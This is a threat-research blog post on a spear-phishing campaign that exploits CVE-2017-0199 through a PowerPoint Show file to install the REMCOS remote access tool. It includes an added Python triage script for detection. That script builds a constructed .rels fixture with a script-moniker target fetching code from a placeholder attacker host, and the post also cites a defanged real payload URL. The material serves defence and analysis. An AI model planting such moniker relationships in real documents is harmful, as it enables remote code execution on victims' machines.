By Ronnie Giagone and Rubio Wu
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited through malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (detected by Trend Micro as TROJ_CVE20170199.JVU) exploiting CVE-2017-0199 with a new method that abuses PowerPoint Slide Show, the first time we have seen this approach used in the wild. Although this is not the first time CVE-2017-0199 has been exploited in an attack, we thought it fitting to analyze the new attack method and provide some insight into how this vulnerability can be abused by other campaigns in the future.
Figure 1: Infection flow for TROJ_CVE20170199.JVU
The exploit arrives as a spear-phishing email attachment, purportedly from a cable manufacturing provider, that drops a remote access tool as its final payload. This fits with what we have observed: these attacks primarily target companies in the electronics manufacturing industry. We believe the targeted attack involves the use of a sender address disguised as a legitimate email sent by a business partner.
The content of the email sample looks like this:
Figure 2: Sample spear-phishing email
While the email itself mentions something about an order request, the recipient will not find business documents attached, but rather a PPSX file that shows the following when clicked:
Figure 3: Screenshot of the PPSX file that abuses CVE-2017-0199
When the malicious PowerPoint Show is opened, it displays the text CVE-2017-8570, which is a different Microsoft Office vulnerability. However, based on our analysis, it actually exploits CVE-2017-0199 instead. This is a leftover from the toolkit developer that the sender did not bother to change.
The file triggers a script moniker in ppt/slides/_rels/slide1.xml.rels. The exploit runs remote code from hxxp://192[.]166[.]218[.]230:3550/logo[.]doc, a VPN or hosting service abused by the attacker.
Figure 4: The payload link to remote malicious code embedded in ppt/slides/_rels/slide1.xml.rels
If we run the sample, PowerPoint initializes the script moniker and runs the remote malicious payload through the PowerPoint Show animations feature.
As the screenshot below shows, once the flaw is successfully exploited, it downloads the file logo.doc (detected by Trend Micro as JS_DLOADER.AUSYVT) from the internet.
Figure 5: Successfully downloading the logo.doc file
Figure 6: logo.doc is not a document file but an XML that downloads RATMAN.EXE
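A static triage of the chain described above, as an added example that is not part of the original analysis or Trend Micro's tooling: it unpacks a PPSX, walks every .rels part for targets that are marked External or use a script:/http: moniker (the ppt/slides/_rels/slide1.xml.rels location comes from the analysis), and checks whether a fetched "logo.doc" is really a document or an XML scriptlet. The package contents, the rels part, the stand-in logo.doc and the URL (attacker.invalid) are constructed for the example and are not the sample's real data.

```python
"""Static triage for the PPSX-based CVE-2017-0199 chain described above.

Added example (not Trend Micro's tooling). Two checks a responder can run
on a quarantined attachment and on the file it fetched:
  1. A PPSX is an OOXML zip; walk every .rels part and flag relationship
     targets that are External or use a script:/http: moniker.
  2. The fetched "logo.doc" is not a Word file but XML that downloads
     RATMAN.EXE; classify by magic bytes instead of trusting the extension.
All inputs below are constructed for the example; the URL is a placeholder.
"""
from __future__ import annotations

import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Schemes that a self-contained slide deck has no business pointing at.
SUSPICIOUS_SCHEMES = {"script", "http", "https", "ftp", "file"}

# Constructed .rels part modelled on the shape the analysis describes:
# an oleObject relationship whose target is a script: moniker.
CONSTRUCTED_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    f'<Relationships xmlns="{REL_NS}">\n'
    '  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
    'officeDocument/2006/relationships/slideLayout" '
    'Target="../slideLayouts/slideLayout1.xml"/>\n'
    '  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/'
    'officeDocument/2006/relationships/oleObject" '
    'Target="script:http://attacker.invalid:3550/logo.doc" TargetMode="External"/>\n'
    '</Relationships>\n'
)

# Constructed stand-in for logo.doc: a Windows Script Component skeleton
# with no downloader logic in it.
CONSTRUCTED_LOGO_DOC = (
    b'<?xml version="1.0"?>\n'
    b'<scriptlet>\n'
    b'  <script language="JScript"><![CDATA[ /* constructed placeholder */ ]]></script>\n'
    b'</scriptlet>\n'
)


def build_constructed_ppsx() -> bytes:
    """Minimal zip shaped like a PPSX (test input, not real malware)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", CONSTRUCTED_RELS)
    return buf.getvalue()


def find_external_targets(ppsx_bytes: bytes) -> list[dict]:
    """Return every relationship in any .rels part whose target is marked
    External or uses a remote/script scheme, with the part it came from."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                scheme = urlsplit(target).scheme.lower()
                external = rel.get("TargetMode", "Internal").lower() == "external"
                if external or scheme in SUSPICIOUS_SCHEMES:
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                        "script_moniker": scheme == "script",
                    })
    return findings


def classify_fetched_payload(data: bytes) -> str:
    """Identify what a fetched 'document' really is from its leading bytes."""
    if data.startswith(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"):
        return "ole-compound-document"   # legacy binary .doc container
    if data.startswith(b"PK\x03\x04"):
        return "ooxml-zip"               # .docx/.pptx/.ppsx package
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return "unknown"
    # A <scriptlet> root is a Windows Script Component, i.e. code, not a document.
    return "windows-script-component" if root.tag.lower() == "scriptlet" else "xml"


if __name__ == "__main__":
    for f in find_external_targets(build_constructed_ppsx()):
        flag = " (script moniker)" if f["script_moniker"] else ""
        print(f"{f['part']}: {f['type']} -> {f['target']}{flag}")
    print("logo.doc is:", classify_fetched_payload(CONSTRUCTED_LOGO_DOC))
```

Pointing find_external_targets at a real attachment is a matter of reading the file's bytes; any oleObject relationship with an External target, and any script: scheme at all, is worth a closer look regardless of what the slide renders. The payload check deliberately ignores the extension, which is exactly what the lure relies on.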
Examining RATMAN.EXE, aka REMCOS RAT
Originally, REMCOS is a legitimate and customizable remote access tool that lets a user control a system from anywhere in the world. Once REMCOS is executed, it gives the perpetrator the ability to run remote commands on the user's system. The tool's capabilities can be seen in the Control Panel screenshot below, which gives an idea of what it can do once it enters a user's system. Its capabilities are quite comprehensive, and include a download & execute command, a keylogger, a screen logger, and recorders for both the webcam and microphone.
Figure 7: Screenshot of the REMCOS RAT Control Panel
While the REMCOS builder normally only offers compression with UPX and MPRESS, the trojanized sample we acquired uses an unknown .NET protector that adds several protections and obfuscations to make it harder for researchers to reverse.
Figure 8: The sample's obfuscation code
After unpacking, the strings in the unpacked sample reveal the version of the REMCOS client it was built from.
Figure 9: Unpacked sample strings
REMCOS uses encrypted communication, including a hardcoded password for authentication and network traffic encryption. For RATMAN.EXE to communicate with its client, the ports and passwords therefore have to be set accordingly.
Figure 10: Using the REMCOS RAT tool
Ultimately, the use of a new attack method is a practical consideration: since most detection methods for CVE-2017-0199 focus on the RTF method of attack, using a new vector, PPSX files, allows attackers to evade antivirus detection.
Mitigation and Trend Micro Solutions
Cases like this highlight the need for users to be cautious when opening files or clicking links in their emails, even when they come from seemingly legitimate sources. Spear phishing attempts can be rather sophisticated, and as seen in this example, can trick most users into downloading malicious files. By implementing proper mitigation techniques against phishing attacks, users can prevent malware that leverages email from infecting them in the first place.
Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with up-to-date patches are safe from these attacks.
In addition to implementing effective mitigation techniques, a multilayered solution such as Trend Micro™ Deep Discovery™ will help provide detection, in-depth analysis, and proactive response to today's stealthy malware and targeted attacks in real time. It provides comprehensive defense tailored to protect organizations against targeted attacks and advanced threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle.
Trend Micro™ Deep Security™ and Vulnerability Protection provide virtual patching that protects endpoints from threats that abuse vulnerabilities. OfficeScan's Vulnerability Protection shields endpoints from known and unknown vulnerability exploits even before patches are deployed.
CVE-2017-0199: New Malware Abuses PowerPoint Slide Show